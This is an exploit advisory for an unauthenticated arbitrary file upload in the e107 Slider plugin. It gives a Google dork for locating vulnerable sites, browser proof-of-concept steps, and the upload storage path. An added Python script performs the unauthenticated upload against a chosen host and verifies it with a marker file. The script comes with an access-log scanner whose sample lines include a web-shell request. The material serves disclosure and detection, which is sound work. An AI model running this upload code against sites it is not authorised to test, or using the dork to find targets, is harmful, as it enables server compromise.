e107 Plugin Slider Arbitrary File Upload Vulnerability


/-----------------------------------------------------------------------------------------------------
# Exploit Title : e107 Plugin Slider Arbitrary File Upload Vulnerability
# Author : Ryuzaki Lawlet / Fahmi Fisal
# Blog  : justryuz.blogspot.com /
# E-mail : ryuzaki_l@y7mail.com /
# Date: June 6/2013 (4.44 pm)
# Version : 1.0
# Vendor: www.e107.org/e107_plugins/psilo/list.php?mode=plugin&cat=0&id=635 (Slider auto random v1.0 )
# Tested on : Ubuntu / Windows XP
# Google Dork : inurl:/e107_plugins/slider
# CVE:
------------------------------------------------------------------------------------------------------/

/------------
Description:
-----------/

An arbitrary file upload vulnerability exists in e107_plugins/slider/admin_upload1.php.
The script accepts the multipart POST request that the plugin's administrator upload form sends, but it does not check that the request comes from an authenticated administrator, so an attacker can send the same POST directly and store a file of their choosing on the server.
The severity increases because the file is written to a directory under the web root and can be requested afterwards, and further where the administrator role is also allowed to post new items.

/-----
Poc
-----/

Open the upload script directly in a browser, without logging in to e107:
Example : http://victim/e107_plugins/slider/admin_upload1.php
If the installation is affected, the page renders the plugin's upload form instead of redirecting to the login page. Choose a file from the right-hand menu and submit it; the other options shown on the page are available in the same way.


Uploaded file access : http://victim/e107_plugins/slider/images/large/ (request the file by the name it was uploaded with)
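The upload step and the retrieval check above, written out as a script. This is an added example, not code from the advisory or from the Slider plugin; it assumes the form's file field is named "file" and that admin_upload1.php keeps the original filename under images/large/ (neither is stated on the page, so confirm both against the form the script renders). Rather than dropping a web shell it uploads a harmless text file carrying a random token and checks whether the token comes back from images/large/. It also goes beyond the advisory with a small access-log scanner for defenders; the sample log lines are constructed, not real traffic.

```python
# Added example (not from the advisory): build the same POST the Slider admin
# upload form sends, verify with a harmless marker file, and scan access logs.
# Assumptions not stated on the page: the file field is named "file" and the
# script stores the file under images/large/ with its original name.
import re
import sys
import uuid
import urllib.error
import urllib.request
from urllib.parse import urljoin

UPLOAD_PATH = "e107_plugins/slider/admin_upload1.php"
STORAGE_PATH = "e107_plugins/slider/images/large/"
FIELD_NAME = "file"  # assumption: check the form admin_upload1.php renders


def target_urls(base, filename):
    """Upload script URL and where the uploaded file is expected to land."""
    base = base if base.endswith("/") else base + "/"
    return urljoin(base, UPLOAD_PATH), urljoin(base, STORAGE_PATH + filename)


def multipart_body(field, filename, content, boundary):
    """Hand-built multipart/form-data body, one file part, CRLF line ends."""
    parts = [
        f"--{boundary}".encode(),
        f'Content-Disposition: form-data; name="{field}"; filename="{filename}"'.encode(),
        b"Content-Type: application/octet-stream",
        b"",
        content,
        f"--{boundary}--".encode(),
        b"",
    ]
    return b"\r\n".join(parts)


def classify_upload_page(status, final_url):
    """Interpret an unauthenticated GET of admin_upload1.php (redirects followed)."""
    if status == 200 and final_url.endswith("admin_upload1.php"):
        return "exposed"        # upload form served with no login
    if status in (401, 403):
        return "protected"
    if status == 404:
        return "absent"
    return "redirected" if "login" in final_url else "unknown"


def marker_file():
    """A harmless text file carrying a random token; no web shell needed."""
    token = uuid.uuid4().hex
    return f"slider-check-{token}.txt", f"slider-check {token}\n".encode(), token


def upload_confirmed(fetched, token):
    return token.encode() in fetched


LOG_RE = re.compile(r'"(?P<m>[A-Z]+) (?P<p>\S+) HTTP/[\d.]+" (?P<s>\d{3})')
SCRIPT_EXT = (".php", ".phtml", ".php5", ".phar")


def suspicious_log_lines(lines):
    """Flag POSTs to the upload script and served scripts under images/large/."""
    hits = []
    for line in lines:
        m = LOG_RE.search(line)
        if not m:
            continue
        path = m.group("p").split("?", 1)[0]
        if m.group("m") == "POST" and path.endswith("/slider/admin_upload1.php"):
            hits.append(("upload_post", line))
        elif "/slider/images/large/" in path and path.lower().endswith(SCRIPT_EXT) \
                and m.group("s") == "200":
            hits.append(("script_in_images", line))
    return hits


# Constructed sample lines in Apache combined format, not real traffic.
SAMPLE_LOG = [
    '10.0.0.5 - - [06/Jun/2013:16:44:01 +0000] "POST /e107_plugins/slider/admin_upload1.php HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    '10.0.0.5 - - [06/Jun/2013:16:44:03 +0000] "GET /e107_plugins/slider/images/large/cmd.php?c=id HTTP/1.1" 200 88 "-" "Mozilla/5.0"',
    '10.0.0.9 - - [06/Jun/2013:16:50:00 +0000] "GET /e107_plugins/slider/images/large/banner1.jpg HTTP/1.1" 200 40211 "-" "Mozilla/5.0"',
]


def check_target(base):
    """Network path: probe the script, upload the marker, try to fetch it back."""
    upload_url, _ = target_urls(base, "")
    try:
        with urllib.request.urlopen(upload_url, timeout=10) as r:
            state = classify_upload_page(r.status, r.geturl())
    except urllib.error.HTTPError as e:
        state = classify_upload_page(e.code, e.geturl())
    filename, content, token = marker_file()
    upload_url, fetch_url = target_urls(base, filename)
    boundary = "----slidercheck" + uuid.uuid4().hex
    req = urllib.request.Request(upload_url, data=multipart_body(FIELD_NAME, filename, content, boundary),
                                 headers={"Content-Type": f"multipart/form-data; boundary={boundary}"})
    try:
        urllib.request.urlopen(req, timeout=10).close()
        with urllib.request.urlopen(fetch_url, timeout=10) as r:
            stored = upload_confirmed(r.read(), token)
    except urllib.error.HTTPError:
        stored = False
    return state, stored, fetch_url


if __name__ == "__main__":
    if len(sys.argv) != 2:
        sys.exit(f"usage: {sys.argv[0]} http://victim/")
    print(check_target(sys.argv[1]))
    for kind, line in suspicious_log_lines(SAMPLE_LOG):
        print(kind, line)
```

Run it as `python3 slider_check.py http://victim/` against a host you are authorised to test. A result of ("exposed", True, url) means the script was served without a login and the marker file came back from images/large/; "redirected" or "protected" with False means the installation rejects the unauthenticated request. The log scanner keys on the two artefacts this issue leaves behind: a POST to admin_upload1.php and a 200 for a script extension under images/large/, a directory that should only ever serve images.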

------------------------------------------------------------------------------------------
Thanks: to all my friends :)
